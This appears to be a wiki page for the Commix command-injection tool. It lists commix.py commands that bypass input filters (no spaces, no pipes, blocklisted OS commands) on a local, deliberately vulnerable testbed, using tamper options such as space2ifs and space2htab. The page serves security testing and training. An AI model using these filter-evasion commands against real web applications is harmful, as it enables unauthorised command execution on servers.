-
-
Notifications
You must be signed in to change notification settings - Fork 819
Filters Bypasses
Note: The following filters bypasses are based on dockerized version of Commix-testbed.
- Filter lax_domain_name.php bypass:
python commix.py --url="http://127.0.0.1/scenarios/filters/lax_domain_name.php" --data="addr=127.0.0.1" --suffix="d.e.f"
- Filter nested_quotes.php bypass:
python commix.py --url="http://127.0.0.1/scenarios/filters/nested_quotes.php" --data="addr=127.0.0.1" --level=3
- Filter no_space.php bypass:
python commix.py --url="http://127.0.0.1/scenarios/filters/no_space.php" --data="addr=127.0.0.1" --tamper="space2ifs"
- Filter no_space_no_colon_no_pipe_no_ampersand.php bypass:
python commix.py --url="http://127.0.0.1/scenarios/filters/no_space_no_colon_no_pipe_no_ampersand.php" --data="addr=127.0.0.1" --technique=f --web-root="/var/www/commix-testbed.com/public_html/" --tamper="space2htab"
- Filter no_space_no_colon_no_pipe_no_ampersand_no_dollar.php bypass:
python commix.py --url="http://127.0.0.1/scenarios/filters/no_space_no_colon_no_pipe_no_ampersand_no_dollar.php" --data="addr=127.0.0.1" --technique=f --web-root="/var/www/commix-testbed.com/public_html/" --tamper="space2htab"
- Filter no_colon_no_pipe_no_ampersand_no_dollar.php bypass:
python commix.py --url="http://127.0.0.1/scenarios/filters/no_colon_no_pipe_no_ampersand_no_dollar.php" --data="addr=127.0.0.1" --technique=f --web-root="/var/www/commix-testbed.com/public_html/" --tamper="space2htab"
- Filter no_white_chars.php bypass:
python commix.py --url="http://127.0.0.1/scenarios/filters/no_white_chars.php" --data="addr=127.0.0.1" --tamper="space2ifs"
- Filter no_white_chars_start_alphanum.php bypass:
python commix.py --url="http://127.0.0.1/scenarios/filters/no_white_chars_start_alphanum.php" --data="addr=127.0.0.1" --tamper="space2ifs"
- Filter no_white_chars_stop_alnum.php bypass:
python commix.py --url="http://127.0.0.1/scenarios/filters/no_white_chars_stop_alnum.php" --data="addr=127.0.0.1" --tamper="space2ifs"
- Filter simple_stop_alphanum.php bypass:
python commix.py --url="http://127.0.0.1/scenarios/filters/simple_stop_alphanum.php" --data="addr=127.0.0.1"
- Filter simple_start_alphanum.php bypass:
python commix.py --url="http://127.0.0.1/scenarios/filters/simple_start_alphanum.php" --data="addr=127.0.0.1"
- Filter multiple_os_commands_blacklisting.php bypass:
python commix.py --url="http://127.0.0.1/scenarios/filters/multiple_os_commands_blacklisting.php" --data="addr=127.0.0.1" --tamper="uninitializedvariable"
At the right side panel, you can find detailed information about Commix Project.